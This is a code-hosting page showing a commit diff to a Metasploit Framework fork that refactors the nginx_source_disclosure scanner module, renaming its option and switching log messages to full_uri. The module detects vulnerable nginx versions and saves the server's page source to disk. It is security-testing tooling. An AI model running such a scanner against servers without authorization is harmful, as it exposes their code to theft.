dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Fix nginx_source_disclosure for full_uri

This commit is contained in:
William Vu 2015-11-25 11:19:27 -06:00
parent 035882702a
commit 7d17c5741b
1 changed files with 8 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
modules/auxiliary/scanner/http/nginx_source_disclosure.rb
View File

@ -35,22 +35,13 @@ class Metasploit3 < Msf::Auxiliary
register_options( register_options(
[ [
OptString.new('URI', [true, 'Specify the path to download the file (ex: admin.php)', '/admin.php']), OptString.new('TARGETURI', [true, 'Specify the path to download the file (ex: admin.php)', '/admin.php']),
OptString.new('PATH_SAVE', [true, 'The path to save the downloaded source code', '']), OptString.new('PATH_SAVE', [true, 'The path to save the downloaded source code', '']),
], self.class) ], self.class)
end end
def target_url
uri = normalize_uri(datastore['URI'])
proto = 'http'
if rport == 443 || ssl
proto = 'https'
end
"#{proto}://#{vhost}:#{rport}#{uri}"
end
def run_host(ip) def run_host(ip)
uri = normalize_uri(datastore['URI']) uri = normalize_uri(target_uri.path)
path_save = datastore['PATH_SAVE'] path_save = datastore['PATH_SAVE']
vuln_versions = [ vuln_versions = [
@ -74,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
}, 25) }, 25)
if res.nil? if res.nil?
print_error("#{target_url} - nginx - Connection timed out") print_error("#{full_uri} - nginx - Connection timed out")
return return
else else
version = res.headers['Server'] version = res.headers['Server']
@ -82,17 +73,17 @@ class Metasploit3 < Msf::Auxiliary
end end
if vuln_versions.include?(version) if vuln_versions.include?(version)
print_good("#{target_url} - nginx - Vulnerable version: #{version}") print_good("#{full_uri} - nginx - Vulnerable version: #{version}")
if (res and res.code == 200) if (res and res.code == 200)
print_good("#{target_url} - nginx - Getting the source of page #{uri}") print_good("#{full_uri} - nginx - Getting the source of page #{uri}")
save_source = File.new("#{path_save}#{uri}","w") save_source = File.new("#{path_save}#{uri}","w")
save_source.puts(res.body.to_s) save_source.puts(res.body.to_s)
save_source.close save_source.close
print_status("#{target_url} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}")) print_status("#{full_uri} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}"))
else else
print_error("http://#{vhost}:#{rport} - nginx - Unrecognized #{res.code} response") print_error("http://#{vhost}:#{rport} - nginx - Unrecognized #{res.code} response")
@ -102,9 +93,9 @@ class Metasploit3 < Msf::Auxiliary
else else
if version =~ /nginx/ if version =~ /nginx/
print_error("#{target_url} - nginx - Cannot exploit: the remote server is not vulnerable - Version #{version}") print_error("#{full_uri} - nginx - Cannot exploit: the remote server is not vulnerable - Version #{version}")
else else
print_error("#{target_url} - nginx - Cannot exploit: the remote server is not ngnix") print_error("#{full_uri} - nginx - Cannot exploit: the remote server is not ngnix")
end end
return return